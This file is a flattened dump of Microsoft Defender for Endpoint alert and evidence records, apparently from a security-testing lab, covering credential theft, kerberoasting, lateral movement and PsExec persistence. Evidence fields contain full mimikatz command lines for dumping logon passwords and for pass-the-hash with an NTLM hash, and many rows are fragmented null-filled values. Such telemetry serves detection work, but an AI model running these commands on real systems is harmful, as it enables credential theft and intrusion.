[ { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV8", "entityType": "User", "evidenceCreationTime": "2022-12-22T09:30:33.92Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "domainName": "MSDXV8", "entityType": "Process", "evidenceCreationTime": "2022-12-22T09:30:33.92Z", "fileName": "powershell_ise.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": "2022-12-22T09:05:20.1978737Z", "parentProcessFileName": "explorer.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 2980, "processCommandLine": "\"PowerShell_ISE.exe\" ", "processCreationTime": "2022-12-22T09:07:41.4690585Z", "processId": 5408, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "044ca0fecf2436aac3f9e7acc3c97b30588c594d", "sha256": "77b4c0f9929073ce132223f3169349f3e7a626c392b7dbc1a39fa89265c2c6bf", "url": null, "userPrincipalName": "jeff@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "domainName": "MSDXV8", "entityType": "Process", "evidenceCreationTime": "2022-12-22T09:30:33.92Z", "fileName": "explorer.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-12-22T09:05:20.1342689Z", "parentProcessFileName": "userinit.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 4992, "processCommandLine": "Explorer.EXE", "processCreationTime": "2022-12-22T09:05:20.1978737Z", "processId": 2980, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "56d2d9f6c4b44cfedcf71a86ed68cd859e5c692d", "sha256": "8c75757111b8bc8bd0730fabe3c99f73f08169dfd54ed6a64dcf983dc53fec4b", "url": null, "userPrincipalName": "jeff@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-18T05:10:33.65Z
Suspicious
None
operator
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
7,696
"mimikatz.exe" privilege::debug sekurlsa::logonpasswords exit
2022-11-18T05:09:25.5414924Z
4,976
2022-11-18T05:04:12.7150402Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
da638037516156122062_1496696411
aa1dbb80-8d9e-4c1e-9717-d9537809f5fe
686
MicrosoftDefenderForEndpoint
2022-11-11T08:20:15.6122294Z
2022-11-12T01:35:43.1766667Z
2022-11-12T01:35:42.84Z
2022-11-11T08:17:07.3633327Z
2022-11-11T08:17:07.3633327Z
Malicious credential theft tool execution detected
A known credential theft tool execution command line was detected. Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
CredentialAccess
Resolved
High
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "test.domain", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-11T08:20:15.65Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-11T08:20:15.65Z", "fileName": "Step3-PasstheHash.txt", "filePath": "C:\\M365DAttack", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "cccd2164b95b9fabbb90dd0faedd3299108a17e0", "sha256": "ed8cc55837d3b6893aeca35f90683571fcf4a650abcf361afb713545606d8284", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-11T08:20:15.65Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-11T08:16:44.2952776Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4704, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt\\\"\" exit", "processCreationTime": "2022-11-11T08:17:06.6760783Z", "processId": 816, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-22T08:48:24.5566667Z
Benign
None
jeff
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-21T04:54:51.0633333Z
Suspicious
None
steve
lab.net
S-1-5-21-2159906967-4174806019-1002223092-1107
null
steve@msdxv8.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T21:45:31.95Z
Suspicious
None
darol
prod.env
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638045931471513680_-728742532
1fe2d53f-2f71-4007-b545-94c136e5eeda
765
MicrosoftDefenderForEndpoint
2022-11-21T02:05:47.1514001Z
2022-11-21T02:34:51.2733333Z
null
2022-11-21T02:02:06.7577322Z
2022-11-21T02:33:22.1944641Z
Possible use of the Rubeus kerberoasting tool
Activity indicating the use of the Rubeus tool was observed on this endpoint. This tool can perform kerberoasting, pass-the-ticket, and other attack techniques that take advantage of Kerberos authentication. During these attacks, attackers often request Kerberos tickets for an account's service principal name (SPN). They then decrypt the tickets to get plaintext credentials associated with the account. Alternatively, they can perform the pass-the-ticket technique to authenticate directly without having to decrypt the obtained tickets.
SuspiciousActivity
New
Medium
null
UnsupportedAlertType
null
null
WindowsDefenderAtp
6606ef29-d293-4f24-a7c5-334dcb40b412
null
null
null
[ "T1558.003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "Low", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:05:47.19Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-21T04:54:50.71Z
Suspicious
None
bob
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1107
null
steve@msdxv8.m365dpoc.com
0a43ff3773e7fcbb9a98029957c41bc3af56ae94
d2ae715f046aec3fccbfb4fe9624fa0c5b5cf45622ca2ace26de9f56552aebe2
chrome.exe
C:\Program Files\Google\Chrome\Application
11,548
"chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=1984,i,9501624012299549115,11600505733383203802,131072 /prefetch:8
2022-12-21T04:51:32.1204974Z
10,208
2022-12-21T04:51:30.5564156Z
chrome.exe
C:\Program Files\Google\Chrome\Application
Detected
4f111b3b2366eacdcc66d7ad73548fff9b039c15
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-09-30T06:14:52.89Z
Suspicious
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
6cbce4a295c163791b60fc23d285e6d84f28ee4c
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
4,064
type secret.txt
2022-09-30T06:11:13.210308Z
null
null
null
null
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-09-30T05:35:16.0533333Z
Suspicious
None
jeff
rnd.local
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638043457288418763_-1172919804
da638043457288418763_-1172919804
741
MicrosoftDefenderForEndpoint
2022-11-18T05:22:08.8420066Z
2022-11-19T01:35:46.6533333Z
2022-11-19T01:35:46.5533333Z
2022-11-18T05:09:26.8699077Z
2022-11-18T05:09:26.8699077Z
Possible lateral movement
Lateral movement on another device was observed in close time proximity to a suspicious network event on this device. This could mean that an attacker is attempting to move laterally across devices to gather data or elevate privileges. This alert was triggered based on a Microsoft Defender for Endpoint alert.
LateralMovement
Resolved
Medium
null
UnsupportedAlertType
TruePositive
SecurityTesting
MTP
ab3e5834-3d38-42c5-aaa6-c1cfc6c02882
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1570", "T1021", "T1021.002", "T1021.003", "T1021.004", "T1021.006" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": null, "accountName": "system", "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:22:08.8733333Z", "fileName": "System", "filePath": "c:\\windows\\system32\\ntoskrnl.exe", "ipAddress": null, "parentProcessCreationTime": "0001-01-01T00:00:00Z", "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": 0, "processCommandLine": "", "processCreationTime": "2022-11-10T07:05:52.3386022Z", "processId": 4, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "3791cf139c5f9e5c97e9c091f73e441b6a9bbd30", "sha256": "e2f1857de3560a5237ca7ea661fc3688715bbbf6baa483511d49baac4ce1acf9", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Ip", "evidenceCreationTime": "2022-11-18T05:22:08.8733333Z", "fileName": null, "filePath": null, "ipAddress": "10.0.0.5", "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Url", "evidenceCreationTime": "2022-11-18T05:22:08.8733333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": "msdxv2-win10b", "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:03:39.97Z
Suspicious
None
jeff
rnd.local
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:03:44.8266667Z
Suspicious
None
jeff
corp.local
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-09-30T06:14:52.89Z
Suspicious
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
6cbce4a295c163791b60fc23d285e6d84f28ee4c
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
4,064
copy con test.txt
2022-09-30T06:11:13.210308Z
null
null
null
null
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-11T08:20:16.0633333Z
Suspicious
None
jeff
evilcorp.cn
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-09-30T06:15:56.7833333Z
Suspicious
None
ronhd
staging.net
S-1-5-21-2300221942-1987151257-321556088-1111
89b6fc86-af84-47b2-a72d-325362598b2c
ronhd@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638037515790902965_1802135643
e8c36505-2a63-4dbe-8d0e-a930ffd7a47b
686
MicrosoftDefenderForEndpoint
2022-11-11T08:19:39.0903155Z
2022-11-18T00:39:00.6933333Z
2022-11-12T01:35:42.84Z
2022-11-11T08:17:13.2923676Z
2022-11-11T08:17:34.312333Z
Suspicious file registered as a service
A file with suspicious attributes or involved in possible breach activity was registered as a service. An attacker might be attempting to register the file as a service for persistence.
Persistence
Resolved
Medium
36
TerminatedBySystem
TruePositive
SecurityTesting
WindowsDefenderAtp
d15c9f84-aabc-46e5-a92e-7bb3ce5eceda
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1021.002", "T1074.002", "T1543.003", "T1569.002", "T1570" ]
[ { "aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600", "defenderAvStatus": "Updated", "deviceDnsName": "staging.net", "firstSeen": "2022-08-08T08:29:47.252Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "onboardingStatus": "Onboarded", "osBuild": 19043, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Semi Auto Client", "riskScore": "High", "tags": [ "semi auto" ], "version": "21H1", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66" } } ]
[ { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV2", "entityType": "User", "evidenceCreationTime": "2022-11-11T08:19:39.2166667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-11T08:19:39.2166667Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-11T08:19:39.2166667Z", "fileName": "ntoskrnl.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": "2022-11-11T08:13:24.9197363Z", "processId": 4, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "ed5324a2b10ad1342da6332982e4c8ec4c3cd096", "sha256": "fc4864065d84ccb4c855f4c47afa318113c1ba81e105c2ca0a8a33b51fe72299", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T05:13:01.0066667Z
Suspicious
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-22T08:50:36.4033333Z
Suspicious
None
jeff
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
6cbce4a295c163791b60fc23d285e6d84f28ee4c
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
6,324
copy con test.txt
2022-12-22T08:47:11.8139068Z
1,896
2022-12-22T08:26:24.0772409Z
explorer.exe
C:\Windows
Detected
7ba8aa008687dd62d639cb45b52c7c9f971c65c1
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-09-30T06:15:56.7833333Z
Suspicious
None
hacker
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1111
89b6fc86-af84-47b2-a72d-325362598b2c
ronhd@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T17:33:38.1366667Z
Suspicious
None
analyst
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638001151822254609_781603445
20d3c0ee-af20-47bf-84df-a7808daa1048
486
MicrosoftDefenderForEndpoint
2022-09-30T06:13:02.225481Z
2022-11-19T01:35:42.7033333Z
2022-10-01T01:36:00.5066667Z
2022-09-30T06:11:55.8115473Z
2022-09-30T06:11:55.8115473Z
Malicious credential theft tool execution detected
A known credential theft tool execution command line was detected. Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
CredentialAccess
Resolved
High
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
msftadmin@msdxv2.m365dpoc.com
null
null
[ "T1003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-09-30T06:13:02.38Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638037516343950835_724143832
96627b9e-719f-4c99-a530-bfa50ad3d20a
686
MicrosoftDefenderForEndpoint
2022-11-11T08:20:34.3951054Z
2022-11-12T01:35:43.1766667Z
2022-11-12T01:35:42.84Z
2022-11-11T08:16:44.6919693Z
2022-11-11T08:17:36.5981924Z
Suspicious sequence of exploration activities
A process called a set of windows commands. These commands can be used by attackers in order to identify assets of value and coordinate lateral movement after compromising a machine.
Discovery
Resolved
Low
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
acfdcbd1-cf72-47be-8e52-6cadc507656d
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1016", "T1018", "T1033", "T1049", "T1087", "T1087.001", "T1135" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "lab.net", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
